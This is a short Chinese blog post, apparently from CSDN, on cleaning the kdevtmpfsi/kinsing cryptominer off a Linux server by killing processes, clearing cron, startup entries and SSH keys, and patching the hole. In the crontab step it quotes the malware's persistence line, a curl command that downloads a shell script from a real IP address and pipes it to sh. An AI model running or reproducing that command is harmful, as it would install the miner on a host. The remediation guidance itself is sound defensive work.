清理 kdevtmpfsi 挖矿进程

朴灿烈づ我的快乐病毒、 2021-09-23 16:44 661阅读 0赞

检查服务器发现资源被kdevtmpfsi占用，这是挖矿进程，必须清理一下。

**1. 检查资源占用最高的进程**

top -H / top -c

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xpbmdlaW8_size_16_color_FFFFFF_t_70][]

**2. 杀掉进程，删除文件**

kdevtmpfsi 有守护进程 kinsing，单独kill掉 kdevtmpfsi 无用。查看进程号后再kill，并清理掉文件。一般在 /tmp 及 /var/tmp/下。

ps -ef | grep kinsing
    ps -ef | grep kdevtmpfsi

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xpbmdlaW8_size_16_color_FFFFFF_t_70 1][]

**3. 清理定时**

因为挂载Yarn用户下，检查 crontab 下是否有其他定时，清除掉。

crontab -e -u yarn
    
    # 清除
    # * * * * * curl http://195.3.146.118/h2.sh | sh > /dev/null 2>&1

**4. 清理启动项**

检查是否有可疑启动项，清除。

cd /etc/rc.d/
    # 及目录下 /etc/rc0.d/、/etc/rc1.d/、/etc/rc2.d/、/etc/rc3.d/、/etc/rc4.d/、/etc/rc5.d/、/etc/rc6.d/
    
    cat /etc/rc.local
    cat /etc/inittab

**5. 清理公钥**

检查是否有可疑公钥。

cat ~/.ssh/authorized_keys

**6. 修复**

根据实际情况，修复被利用的漏洞，或设置定向访问，或配置权限，或修复防火墙等等。

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xpbmdlaW8_size_16_color_FFFFFF_t_70]: /images/20210923/043ae9f5618249069fd20083628d8ff5.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xpbmdlaW8_size_16_color_FFFFFF_t_70 1]: /images/20210923/e335bc160e0f4c8e8a2dd575a0d17ad9.png